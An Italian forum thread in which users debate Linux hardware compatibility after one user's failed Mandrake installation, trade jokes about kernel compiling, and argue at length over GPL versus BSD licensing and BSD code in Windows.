          un forno o come qualsiasi altro
          elettrodomestico. Perché continuate a
          pensare che debba essere considerato una
          macchina per soli "addettiai lavori"? perche' se permetti vorrei farci qualcosa di piu' che impostare un tempo di cottura e premere "accendi"... ma la maggior parte della gente lo vuole proprio come un forno.
  • Anonimo scrive:
    Non e' chiaro, non e' chiaro
    C'e' qualcosa di chiaro e sicuro o sono solo chiacchere?
  • Anonimo scrive:
    Compro harware compatibili con "TUTTI" i sistemi.
    Mi dispiace, ma io oramai acquisto software che sia compabitibile con diversi sistemi (il "TUTTI" del post è eronico).In generale hardware di ottima qualità è compatibile sia con sistemi Microsoft, Linux, Mac OS etc...Purtroppo alcuni produttori di hardware anche di ottima fattura NON includono o VOGLIONO includere supporto per Linux, l'importante prima di effettuare un'acquisto è oltre a valutare rapporto/prezzo/qualità del prodotto anche se questo supporta svariati sistemi operativi.Perchè io voglio che la mia stampante/scanner/o altro funzioni egregiamente sia sotto il mio vecchio windows che sia sotto il mio caro linux.Ciao!
    • Anonimo scrive:
      Re: Compro harware compatibili con
      ho appena installato mandrake 8.2 e' la mia prima volta con linux e con enorme dispiacere devo dire che non e' possibile utilizzare:il mio caro TA USB,il vecchio modem 56k,la stampanteMi dispiace molto ma di certo non posso riacquistare queste periferiche e allora in primo luogo non posso navigare con Linux.mi direte: e chi se ne frega? a me dispiace pero'.. tra l'altro il mouse (logitec optical wheel mouse) e' mooolto piu' lento e "pesante" che con Windows ma forse trovero' il rimedio a questo...
      • Anonimo scrive:
        Re: Compro harware compatibili con
        - Scritto da: qws
        ho appena installato mandrake 8.2 e' la mia
        prima volta con linux e con enorme
        dispiacere devo dire che non e' possibile
        utilizzare:

        il mio caro TA USB,
        il vecchio modem 56k,
        la stampanteIo scommetto che se cerchi un po' in giro la maniera per farli girare la trovi. Io non ho trovato ancora niente che non sono riuscito a far funzionare sotto linux, e non sono un guru o presunto tale. Quante volte capita che il plug and play di Win faccia acqua? Poi bisogna rimediare. Idem per linux.
        Mi dispiace molto ma di certo non posso
        riacquistare queste periferiche e allora in
        primo luogo non posso navigare con Linux.
        mi direte: e chi se ne frega? a me dispiace
        pero'..

        tra l'altro il mouse (logitec optical wheel
        mouse) e' mooolto piu' lento e "pesante" che
        con Windows ma forse trovero' il rimedio a
        questo...Oltretutto devi considerare che stai facendo girare un kernel generico come quello della Mandrake. Prova a scaricare i sorgenti, adattare il tutto al tuo hardware (tranquillo si fa tutto con tool grafici se vuoi) e ricompilare vedrai che differenza.Ormai non c'e' quasi nulla che non giri sotto linux. Puo' far cilecca il plug and play ma si rimedia sempre.
        • Anonimo scrive:
          Re: Compro harware compatibili con
          QWS: Dai una bella ricerca, una ricompilata, una patchata e sei a posto.. cosa aspetti?!Sotto linux gira quasi tutto, e' giunto il momento di imparare nuove cose e di arricchire la tua cultura informatica.Auguri
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: aLeX
            QWS: Dai una bella ricerca, una ricompilata,
            una patchata e sei a posto.. cosa aspetti?!
            Sotto linux gira quasi tutto, e' giunto il
            momento di imparare nuove cose e di
            arricchire la tua cultura informatica.

            Auguriio ho installato mandrake )8.1 acquitata da mondadori informatica) seguendo le indicazioni che mi avevte dato qui in altro forum.Naturalmente non funziona.HO mandato qualche e-mail ad alcuni webangel e sto aspettando risposte. In giro leggo solo commenti entusiasti, ma devo ancora vedere un solo pc o notebook con linux installato che funzioni (non dico meglio di uno con wim, ma che funzioni semplicemente).E leggere dei vostri commenti entusiasti ed inviti a cercare patchare ricompilare francemente mi fa pensare solo a patetici emuli di Wanna Marchi.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: toto63....
            E leggere dei vostri commenti entusiasti ed
            inviti a cercare patchare ricompilare
            francemente mi fa pensare solo a patetici
            emuli di Wanna Marchi.Il concetto che agli altri invece funzioni ti è così estraneo ?P.S. In 3 anni di Linux non ho mai ne patchato ne ricompilato il kernel.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: TeX
            P.S. In 3 anni di Linux non ho mai ne
            patchato ne ricompilato il kernel.Come puoi rinunciare a sittanto???.... quella sensazione di possenza tra le mani... il gusto di battere unmake dep && make clean && make bzImage... poi premere invio ...e sentire l'anteriore del tuo nuovo server biprocessore che si solleva e fa fatica a scaricare la potenza...schermate e schermate di gcc che ti frullano davanti in questa inquietante dimostrazione di potenza di calcolo...Per ottenere poi, quale diamante da immensa fornace, quell'unico, piccolo file che ti manderà avanti la macchina...Come ripagare l'adrenalina del primo reboot? La spasmodica attesa del [FAILED] davanti al modulo mancante... la delusione al primo Unresolved Symbol...Che è mai la vita di un pinguino senza la compilazione???Dio abbia in gloria il make...
          • Anonimo scrive:
            Re: Compro harware compatibili con
            cat vmlinuz
            /dev/dsp (quella potenza la puoi anche ascoltare :-)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            cat vmlinuz
            /dev/dsp
            (quella potenza la puoi anche ascoltare :-)la potenza e' nulla senza controllo quindi leggi gli howto in esperanto che sono universali ed esprimono fratellanza fra le nazioni infatti nessuno li capisce ugualmetne
          • Anonimo scrive:
            Re: Compro harware compatibili con
            ahahahahaha bastaaaaa pogo
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            ahahahahaha bastaaaaa pogoAdesso ti denuncio per diffamazione aggravata! tienimi lontano Linucs e anche la GPL!!! ma che schifooo
          • Anonimo scrive:
            Re: Compro harware compatibili con
            ma davvero non sei tu?? (ci avrei messo le mani sul fuoco)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            ma davvero non sei tu?? (ci avrei messo le
            mani sul fuoco)Non sentiresti nulla dato che sei abituato a maneggiare la GPL!! :o)Io comunque uso i punti e le virgole... e per fortuna howto in esperanto non he ho mai visti!
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            Non sentiresti nulla dato che sei abituato a
            maneggiare la GPL!! :o)
            e non la usareeeee se ti fa schifo :PPPP
            Io comunque uso i punti e le virgole... e
            per fortuna howto in esperanto non he ho mai
            visti!ahahaha per fortuna neanche io
          • Anonimo scrive:
            Re: Compro harware compatibili con
            Lo credevo anch'io un tempo. Poi un giorno Linucs ha postato una cover di una canzone di Judo Boy e dell'Uomo Tigre. Visto il suo odio per il mondo intero è evidente che nella sua infanzia frustrata Pogoboy non ha mai guardato un cartone animato...- Scritto da: z2
            ma davvero non sei tu?? (ci avrei messo le
            mani sul fuoco)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Ender
            Lo credevo anch'io un tempo. Poi un giorno
            nella sua infanzia frustrata Pogoboy non ha
            mai guardato un cartone animato...candy e' poesiacandy candy e' l'armoniacandy e' la magiacandy candy e' simpatiae tutti i sorgenti si porta viae' zucchero filatoe' curiosita'e' un mondo di pensieri e liberta'con la gpl che la proteggera'e' un fiore delicatoe' felicita'che a spasso col suo gatto se ne vaquindi microsoft non la sfruttera'candy oh candy nella vita sola non seianche nella neve piu' bianca, piu' alta che maise non vedo non credo son come san tommaso cos'e' la polverina che tira su col naso?
          • Anonimo scrive:
            Re: Compro harware compatibili con
            Oggi ho messo un nuovo pacchetto binario tgz sul FreeBSD 4.5 che ho su una partizione (sai che crea un volume del disco con il disklabel sulla tavola delle partizioni DOS) del mio notebook Acer 212TXV, facente parte del set di CD di questa versione fornito dal gruppo di FreeBSD; tò era GPL.Ricordarsi che una lic. con la bontà (sopratutto tecnica) del sw, non c'entra niente; e che purtroppo il n.s. nemico M$ pesca tra i sorgenti BSD, senza dover ridare i sorgenti (per quanto faccia schifo il sw M$) elaborati, cosa che gli consnte di creare ed alimentare il suo monopolio.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: BSD_like
            (sai che crea un volume del disco con il
            disklabel sulla tavola delle partizioni DOS)DAI!! davvero?!! :o)
            del mio notebook Acer 212TXV, facente parte
            del set di CD di questa versione fornito dal
            gruppo di FreeBSD; tò era GPL.scommettiamo che non lo userai per fare un tuo prodotto e cercare di venderlo senza fare la fine di progeny?
            Ricordarsi che una lic. con la bontà
            (sopratutto tecnica) del sw, non c'entra
            niente; e che purtroppo il n.s. nemico M$Infatti l'unico software gestito coi piedi che ho visto in ambito GPL e' Linux, e forse un paio di cose scritte in PHP da ragazzini brufolosi.
            pesca tra i sorgenti BSD, senza dover ridareInfatti hanno pescato tutto Office e il DCOM, grazie al codice bsd dominano il mercato..!
          • Anonimo scrive:
            Re: Compro harware compatibili con
            Chi ha detto che è solo grazie al codice BSD che dominano il mercato; ma prova a toglierli le porzioni di codice BSD da windows e dai restanti sw (per inciso M$ non dichiara mai espressamente quanto codice BSD c'è nel suo sw, ma solo che ne usa, con che risultati poi!); e vedrai come girano; win non booterebbe neanche fermandosi al DOS.E se ti piace, il disklabel dei *BSD è utilizzato anche da AIX nella vers. 4.2 dello stile BSD; con la differenza che AIX vi pone un cosidetto filesystem journaled non virtuale, come il Reiserfs o l'ext3 di Linux, il jfs; l'ufs dei BSD effettua un "link" ai meta data del filesystem, per l'appunto un virtual journaled filesystem. Caratteristiche principali dell'ufs è quindi di essere velocissimo, con l'algoritmo stabile poi, anche di essere stabilissimo; necessita però altrettanto di un o.s. stabilissimo, come per l'appunto i *BSD. Infatti un'eventuale crash ha una probabilità più alta degli altri filesystem journaled di "mangiarsi" i dati; ma con i *BSD non si vedono crash, per cui possono tranquillamente utilizzare quel filesystem journaled.Ma credo di essere O.T. a questo punto!
          • Anonimo scrive:
            Re: Compro harware compatibili con
            Pardon ho firmato con il nike di un'altra persona di cui stavo leggendo il post con un'altra finestra del browser in quel momento in cui ti ho risposto, sui forum a tema libero.Scuse ad entrambi.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: BSD_like
            Scuse ad entrambi.Troppo tardi ora mi devi dare tutti i tuoi sorgenti!!=)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            A parte le scuse per il nick (spero accettate), sai benissimo che ho parlato solo di ufs e journaled filesystem, andando fuori O.T., poi.Ed il jfs di IBM non è ne ufs ne vuol dire journaled filesystem; non è colpa mia se lo chiamano cosi.Le prove che win non booterebbe neanche, bè nessuno sà dove c'è il codice BSD in win, ma comincia a toglierlgli telnet, lo stack TCP/IP, e già il sistema avrebbe problemi a funzionare, difatti l'indirizzo riservato 127.0.0.1 non potrebbe essere richiamato da alcuni servizi e chiamate di sistema.E quelli sono 2 esempi che si sanno e che mi ricordo in win.Come detto praticamente, neanche booterebbe.Poi, windows non è uno UNIX e non ha nessun diritto morale M$ di accedere a quel codice; e a quelle tecnologie.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: BSD_like
            Ed il jfs di IBM non è ne ufs ne vuol dire
            journaled filesystem; non è colpa mia se lo
            chiamano cosi.Poco importa, tanto e' GPL. UFS almeno si puo' utilizzare.
            funzionare, difatti l'indirizzo riservato
            127.0.0.1 non potrebbe essere richiamato daProva a eliminare il tcp/ip dal control panel e vedi che cosa fa.
            Poi, windows non è uno UNIX e non ha nessun
            diritto morale M$ di accedere a quel codice;
            e a quelle tecnologie.Buona questa... me la segno :o)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            Bè il jfs è GPL da alcuni mesi, prima era closed; e ciò che è GPL non significa che non lo puoi usare; sei semplicemente obbligato a dare i sorgenti dell'elaborazione.Su win, io non scommetterei troppo sulla funzionalità dell'o.s. senza codice BSD; nessuno sà con esattezza quanto ve ne sia; ma toglierlo significa minare l'o.s. nelle sue funzionalità di base, tra cui per l'appunto le chiamate tcp/ip (e "dio sà quant'altro"). Confermo che M$ in win* non ha nessun diritto morale di utilizzare codice BSD (segnala pure!), poichè win è un concorrente degli UNIX sui server medi e piccoli e sul cosidetto descktop su cui girano degli UNIX tra cui i *BSD; e (grave reato) non è UNIX!
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            Infatti hanno pescato tutto Office e il
            DCOM, grazie al codice bsd dominano il
            mercato..!non mi sembra una bella cosa, ne' una cosa di cui andar fieri. (sai benissimo che non e' solo grazie al codice bsd)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            non mi sembra una bella cosa, ne' una cosa
            di cui andar fieri. (sai benissimo che non
            e' solo grazie al codice bsd)E allora forse e' il caso di finirla con questa farsa del codice BSD con cui m$ domina il mondo.Almeno W2K ha un tcp/ip, a seguire loro eravamo ancora in netbeui (preferivi?)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            E allora forse e' il caso di finirla con
            questa farsa del codice BSD con cui m$
            domina il mondo.
            mai detto nulla di simile; dico che fossi in te non mi vanterei del fatto che un azienda che monopolizza un mercato con pratiche scorrette si avvantaggi di codice bsd
            Almeno W2K ha un tcp/ip, a seguire loro
            eravamo ancora in netbeui (preferivi?)avrei preferito che M$ usasse codice proprio visto che il loro motto sembra essere "quel che e' mio e' mio e quel che e' tuo e' mio", se volevano uno stack tcp/ip fatto bene se lo potevano implementare da soli.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            mai detto nulla di simile; dico che fossi in
            te non mi vanterei del fatto che un azienda
            che monopolizza un mercato con pratiche
            scorrette si avvantaggi di codice bsdSono liberi di farlo. Si chiama "open source" :o)
            avrei preferito che M$ usasse codice proprioPoi avrebbero detto che "e' bacato" oppure "non rispetta gli standard". Poverini, visto che non sono capaci almeno per una volta hanno usato una cosa che funziona.
            visto che il loro motto sembra essere "quel
            che e' mio e' mio e quel che e' tuo e' mio",Piu' o meno come la GPL, dove quello che e' tuo diventa mio appena usi qualche mia stupida libreria.
            se volevano uno stack tcp/ip fatto bene se
            lo potevano implementare da soli.E allora a cosa serve l'open source? A far piacere a Stallman? :o)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            Sono liberi di farlo. Si chiama "open
            source" :o)
            troppo comodo prendere senza dare nulla in cambio
            Poi avrebbero detto che "e' bacato" oppure
            "non rispetta gli standard". Poverini, visto
            che non sono capaci almeno per una volta
            hanno usato una cosa che funziona.
            be' i soldi per pagare i programmatori ce li hanno se non riescono a tirare fuori nulla di buono affari loro
            Piu' o meno come la GPL, dove quello che e'
            tuo diventa mio appena usi qualche mia
            stupida libreria. il tuo medico ti ha ordinato di fare uso regolare di librerie gpl?

            se volevano uno stack tcp/ip fatto bene se

            lo potevano implementare da soli.

            E allora a cosa serve l'open source? A far
            piacere a Stallman? :o)scusa ma tu rilasci i sorgenti o fai la sanguisuga come M$? (perche' se rilasci i sorgenti allora la tua affermazione ha un senso, altrimenti e' solo ipocrisia)(mi stai facendo venire voglia di piallare l'OpenBSD che ho su una macchina)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            troppo comodo prendere senza dare nulla in
            cambio Se permetti decido io che cosa dare in cambio. Tutto, niente, qualcosa, un pezzo oggi, un pezzo domani. Non mi pare un gran concetto. Del software che scrivo io decido io che cosa fare.
            be' i soldi per pagare i programmatori ce li
            hanno se non riescono a tirare fuori nulla
            di buono affari loro Affari loro appunto.
            il tuo medico ti ha ordinato di fare uso
            regolare di librerie gpl?Ovviamente no, pero' qualcuno se n'e' saltato fuori con una proposta di legge dove si parla delle "4 (false) liberta'" che fanno ridere quanto le 3 I di Berlusconi.
            scusa ma tu rilasci i sorgenti o fai la
            sanguisuga come M$? (perche' se rilasci iQualcosa si', qualcosa no. Il "qualcosa no" e' quello che permette a un'azienda di campare senza fare la fine di Mandrake che chiede elemosina sul suo sito.Il "qualcosa si'" e' la parte che puo' essere utile a qualcuno e che i miei concorrenti non possono comprare per poi rivendere a quattro dollari sbattendomi fuori dal mercato. Se proprio mi serve una libreria GPL ci giro intorno e ti do' un bel sorgente di 4 righe, collegato al resto del software con qualche oscuro, incomprensibile protocollo.Se alla m$ sono in vena di arraffare non e' certo la GPL a fermarli, basta vedere quante societa' hanno fatto fallire.
            (mi stai facendo venire voglia di piallare
            l'OpenBSD che ho su una macchina)In tal caso, peggio per te: se agisci accecato dall'ideologia del barbuto ti perdi un'occasione per espandere la tua cultura :o)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            Se permetti decido io che cosa dare in
            cambio. Tutto, niente, qualcosa, un pezzo
            oggi, un pezzo domani. Non mi pare un gran
            concetto. Del software che scrivo io decido
            io che cosa fare.se questo e' valido per te perche' non dovrebbe essere valido per chi rilascia sotto gpl? Visto che il software lo ha scritto lui dovrebbe aver diritto di rilasciarlo con le clausole che piu' gli aggradano, poi se a te non stanno bene non lo usare; non capisco questo accanimento.(comunque OpenBSD non lo sbaraccherei mi ci diverto troppo :-)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            se questo e' valido per te perche' non
            dovrebbe essere valido per chi rilascia
            sotto gpl? Visto che il software lo haPerche' la SUA licenza va ad appiccicarsi al MIO software. Se gli piace il software "libero" puo' usare la LGPL che al contrario della GPL e' una licenza civile che impedisce ugualmente di "chiudere" (ahah!) i sorgenti.
            (comunque OpenBSD non lo sbaraccherei mi ci
            diverto troppo :-)sissi' cominciano tutti cosi'... =)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            Perche' la SUA licenza va ad appiccicarsi al
            MIO software. Se gli piace il softwaredimentichi che il software e' libero come l'aria quindi e' di tutti quindi il tuo software e' anche mio e se io scrivessi software sarebbe anche tuo ma io non lo scrito perche' ho gia' tutto quello che mi serve in debian gnu/linux stable
            "libero" puo' usare la LGPL che al contrario
            della GPL e' una licenza civile chela lgpl e' uno strumento del monopolio per corrompere i prodi dell'open source la cui unica arma legale e morale e' la gpl ovviamente

            (comunque OpenBSD non lo sbaraccherei mi
            ci

            diverto troppo :-)anche zap ora usa debian quindi dovreste usarla anche voi
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            Perche' la SUA licenza va ad appiccicarsi al
            MIO software. Se gli piace il software
            "libero" puo' usare la LGPL che al contrario
            della GPL e' una licenza civile che
            impedisce ugualmente di "chiudere" (ahah!) i
            sorgenti.
            si ma si 'appiccica' solo se usi codice e/o librerie gpl, basta non usarli e sei a posto no?

            (comunque OpenBSD non lo sbaraccherei mi
            ci

            diverto troppo :-)

            sissi' cominciano tutti cosi'... =)nono e' solo che non ho pregiudizi dettati dalle licenze IO e uso qualsiasi OS ritenga valido se mi serve o ne ho la curiosita'.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            si ma si 'appiccica' solo se usi codice e/o
            librerie gpl, basta non usarli e sei a posto
            no? Se e' per quello basta evitare di sviluppare sotto Linux e continuare ad usare m$, ma non mi pare fosse quello lo scopo del gioco...
            dalle licenze IO e uso qualsiasi OS ritenga
            valido se mi serve o ne ho la curiosita'. Pure io, infatti evito Linux come la peste (e non solo per l'ovvia GPL che nel caso del kernel mi sposta poco)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            Se e' per quello basta evitare di sviluppare
            sotto Linux e continuare ad usare m$, ma non
            mi pare fosse quello lo scopo del gioco...
            ok da una parte posso capire che ti faccia incazzare il dover rilasciare per forza sotto gpl o lo scriverti da zero le librerie se vuoi sviluppare sotto GNU/Linux ma dall'altra devi capire che GNU/Linux e' stato creato e portato avanti proprio per quello scopo (che tu sia daccordo o no)e dato che nessuno cerca di costringere la gente ad usarlo, rimane una libera scelta. C'e'chi preferisce avere del software libero ma perdere degli sviluppatori; fai la tua scelta ma piantala di dare addosso a chi fa una scelta diversa tanto non serve a nulla :o)

            dalle licenze IO e uso qualsiasi OS
            ritenga

            valido se mi serve o ne ho la curiosita'.

            Pure io, infatti evito Linux come la peste
            (e non solo per l'ovvia GPL che nel caso del
            kernel mi sposta poco)scusa ma a parte la (recente) gestione incasinata del kernel che hai da ridire?
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            quello scopo (che tu sia daccordo o no)e
            dato che nessuno cerca di costringere la
            gente ad usarlo, rimane una libera scelta.A me resta il vago sospetto che buona parte dei personaggi siano saltati sul carrozzone senza leggere la GPL solo per avere software gratis (eventualmente belando di gioia: beeeeeeeeeeeh!) =)
            scusa ma a parte la (recente) gestione
            incasinata del kernel che hai da ridire?Recente?
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            A me resta il vago sospetto che buona parte
            dei personaggi siano saltati sul carrozzone
            senza leggere la GPL solo per avere software
            gratis (eventualmente belando di gioia:
            beeeeeeeeeeeh!) =)se fosse solo per avere software gratis avrebbero potuto usare i *BSD


            scusa ma a parte la (recente) gestione

            incasinata del kernel che hai da ridire?

            Recente?si vabbe' non c'e' il cvs e tutto deve passare prima per Linus, nonostante cio' di casini non ce ne sono stati troppi a parte la storia della vm
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: z2
            se fosse solo per avere software gratis
            avrebbero potuto usare i *BSD "Ma e' diffiiicileee"
            si vabbe' non c'e' il cvs e tutto deve
            passare prima per Linus, nonostante cio' di
            casini non ce ne sono stati troppi a parte
            la storia della vmOltretutto sei stato tu a evocarmi stamattina e a farmi uscire dalla mia tana, quindi te la sei cercata!!=)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pogoboy
            - Scritto da: z2


            se fosse solo per avere software gratis

            avrebbero potuto usare i *BSD

            "Ma e' diffiiicileee"ahahah sara' ma io l'OpenBSD che ho non lo trovo cosi' difficile da usare

            si vabbe' non c'e' il cvs e tutto deve

            passare prima per Linus, nonostante cio'
            di

            casini non ce ne sono stati troppi a parte

            la storia della vm

            Oltretutto sei stato tu a evocarmi
            stamattina e a farmi uscire dalla mia tana,
            quindi te la sei cercata!!

            =)e lo so' ogni tanto anche io faccio qualche caxxata :o)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            Mitico :o)
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: toto63
            io ho installato mandrake )8.1 acquitata da
            mondadori informatica) seguendo le
            indicazioni che mi avevte dato qui in altro
            forum.Hmmmm
            Naturalmente non funziona.Ovviamente.
            HO mandato qualche e-mail ad alcuni webangel
            e sto aspettando risposte. Aspetta e spera. 8)
            In giro leggo solo commenti entusiasti, ma
            devo ancora vedere un solo pc o notebook con
            linux installato che funzioni (non dico
            meglio di uno con wim, ma che funzioni
            semplicemente).A casa ne ho tre. E praticamente non sono mai riuscito a _non_ far funzionare un PC su cui ho installato una versione di Linux (be' anche diversi *BSD, ma non allarghiamoci 8).Non fraintendere, alle volte _alcune_ cose possono non andare (per mancato supporto, ad es.), ma comunque il sistema va.
            E leggere dei vostri commenti entusiasti ed
            inviti a cercare patchare ricompilare
            francemente mi fa pensare solo a patetici
            emuli di Wanna Marchi.Questa ti e' un po' scivolata (capisco la delusione, pero'...).Il primo consiglio serio che ti posso dare e' di trovarti un amico che conosca Linux e di fartelo installare da lui. E' difficile dare suggerimenti _sensati_ a distanza a un inesperto che probabilmente si incasina da solo (senza offesa, ma se non sei riuscito ancora ad installarlo da solo, con una distribuzione _recente_, o hai grossi problemi con l'HW o c'e' qualcosa che probabilmente non supererai mai se non la vedi fare da qualcun'altro).L'altro consiglio e' quello di _dubitare_ di chi ti dice che basta ricompilare. 8)La ricompilazione del kernel, ormai fin dal 2.2.x, non e' piu' una cosa indispensabile e in genere non ti serve per far partire il sistema.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: Pingui'

            E leggere dei vostri commenti entusiasti
            ed

            inviti a cercare patchare ricompilare

            francemente mi fa pensare solo a patetici

            emuli di Wanna Marchi.
            Questa ti e' un po' scivolata (capisco la
            delusione, pero'...).NOn è delusione è pura frustrazione, con la subdola sensazione d'essere costantemente preso per il fondelli.Anche lo sciogli pancia della Marchi era perfetto, funzionava a meraviglia e c'era sempre qualcuno che conosceva qualcuno che l'aveva usato con grande profito.
            Il primo consiglio serio che ti posso dare
            e' di trovarti un amico che conosca Linux e
            di fartelo installare da lui.NON conosco nessuno che conosca linux, l'abbia installato sul suo pc o notebook o sul lavoro, e lo sappia non dico installare, ma neppure usare.Vivo a Bari ho contattato i vari siti linux d'italia e della zona ed ricevuto una sola risposta di qualcuno che aveva passato la mia mail ad un altro.Questo è quanto.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: toto63
            NON conosco nessuno che conosca linux,
            l'abbia installato sul suo pc o notebook o
            sul lavoro, e lo sappia non dico installare,
            ma neppure usare.
            Vivo a Bari ho contattato i vari siti linux
            d'italia e della zona ed ricevuto una sola
            risposta di qualcuno che aveva passato la
            mia mail ad un altro.
            Questo è quanto.Beh che dire... c'è solo un commento da fare: sei sfigato....
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: toto63
            Vivo a Bari ho contattato i vari siti linux
            d'italia e della zona ed ricevuto una sola
            risposta di qualcuno che aveva passato la
            mia mail ad un altro.http://lugbari.linux.it/
          • Anonimo scrive:
            Re: Compro harware compatibili con
            che strana la vita, io sono un assemblatore Hardware e non ho ancora travato un pc dove la mia bella redhat non giri... dal p2 al p3, dal celeron 900 all in one al vecchio celeron 300a passando per i duron 850 etc...
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: toto63
            io ho installato mandrake )8.1 acquitata da
            mondadori informatica) seguendo le
            indicazioni che mi avevte dato qui in altro
            forum.
            Naturalmente non funziona.
            HO mandato qualche e-mail ad alcuni webangel
            e sto aspettando risposte.
            In giro leggo solo commenti entusiasti, ma
            devo ancora vedere un solo pc o notebook con
            linux installato che funzioni (non dico
            meglio di uno con wim, ma che funzioni
            semplicemente).
            E leggere dei vostri commenti entusiasti ed
            inviti a cercare patchare ricompilare
            francemente mi fa pensare solo a patetici
            emuli di Wanna Marchi.Passare da Windows a Linux non e' come passare dal caffe' al caffe' decafeinato. Ci vuole un minimo di cultura informatica.Posso solo darti alcune indicazioni, ma il passo lo devi fare tu:http://www.attivissimo.net (da Windows a Linux)http://www.linux.it (cerca i Linux User Group della tua zona)http://www.pluto.linux.it (documentazione)CiaoFabio
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: toto63
            Naturalmente non funziona.Perché "naturalmente"?
            In giro leggo solo commenti entusiasti, ma
            devo ancora vedere un solo pc o notebook con
            linux installato che funzioni (non dico
            meglio di uno con wim, ma che funzioni
            semplicemente).Puoi venire qui dove lavoro io, tra laptop, desktop e server ce ne saranno una trentina...
            E leggere dei vostri commenti entusiasti ed
            inviti a cercare patchare ricompilare
            francemente mi fa pensare solo a patetici
            emuli di Wanna Marchi.Grazie per l'opinione ragionata, argomentata e civile.Vallo a dire ad IBM, Sun, HP, Pixar, DreamWorks, al governo tedesco, a quello cinese, a quello coreano e alla stessa Microsoft che sembra preoccupata della diffusione di Linux, al punto da fare pubblicità denigratorie...P.S.Sono cinque anni che non compilo né patcho niente (tranna la roba su cui lavoro, ovviamente ;o).
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: A.C.
            - Scritto da: toto63

            Naturalmente non funziona.

            Perché "naturalmente"?


            In giro leggo solo commenti entusiasti, ma

            devo ancora vedere un solo pc o notebook
            con

            linux installato che funzioni (non dico

            meglio di uno con wim, ma che funzioni

            semplicemente).

            Puoi venire qui dove lavoro io, tra laptop,
            desktop e server ce ne saranno una
            trentina...


            E leggere dei vostri commenti entusiasti
            ed

            inviti a cercare patchare ricompilare

            francemente mi fa pensare solo a patetici

            emuli di Wanna Marchi.

            Grazie per l'opinione ragionata, argomentata
            e civile.
            Vallo a dire ad IBM, Sun, HP, Pixar,
            DreamWorks, al governo tedesco, a quello
            cinese, a quello coreano e alla stessa
            Microsoft che sembra preoccupata della
            diffusione di Linux, al punto da fare
            pubblicità denigratorie...
            La differenza tra linuxiani e non, sta sempre nell'approccio.Il linuxiano parte spesso con estrema umiltà e voglia di dedicare tempo e risorse per un sistema che di fatto ne richiede. Se ce la fa,e' molto piu' soddisfatto e orgoglioso di avere istallato un SO stabile, gratuito ed efficente rispetto a chi picchia un cd e dopo 20 min ha tutto pronto.E' una lotta senza fine e senza vincitori.
            P.S.Sono cinque anni che non compilo né
            patcho niente (tranna la roba su cui lavoro,
            ovviamente ;o).Un utente win non vede l'ora di passare alla nuova versione.
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: polemico
            La differenza tra linuxiani e non, sta
            sempre nell'approccio.Sicuro.
            Il linuxiano parte spesso con estrema umiltà
            e voglia di dedicare tempo e risorse per un
            sistema che di fatto ne richiede. Se ce la
            fa,
            e' molto piu' soddisfatto e orgoglioso di
            avere istallato un SO stabile, gratuito ed
            efficente rispetto a chi picchia un cd e
            dopo 20 min ha tutto pronto.La stessa cosa che faccio con la mia Red Hat...
            E' una lotta senza fine e senza vincitori. Perché ci deve essere un vincitore? Vince chi riesce ad usare ciò che fa meglio al caso suo, dopo che l'ha *scelto*, non che l'ha *accettato*.

            P.S.Sono cinque anni che non compilo né

            patcho niente (tranna la roba su cui

            lavoro, ovviamente ;o).
            Un utente win non vede l'ora di passare alla
            nuova versione.Il mio sistema è aggiornato a ieri: http://www.ximian.com/products/ximian_red_carpet/
          • Anonimo scrive:
            Re: Compro harware compatibili con
            - Scritto da: A.C.
            - Scritto da: toto63

            Naturalmente non funziona.
            Perché "naturalmente"?perché già in passato avevo provato diverse versioni sul vecchio PII, che naturalmente aveva la scheda video S3 che naturalmente non era supportata, e naturalmente non funzionava, ogni volta che riuscivo ad avviare un programma si bloccava e non mi faceva il mount del floppy e del cdrom, che però usava regolarmente per lilio e l'installazione. Ora con quest aversione è scritto sulla scatola che la sis630 è supportata, ma naturalmente, nonostante il salto mortale triplo con avviatmento carpiato suggeritomi in altro post, non la riconosce e mi parte solo in mod testo, quando parte.

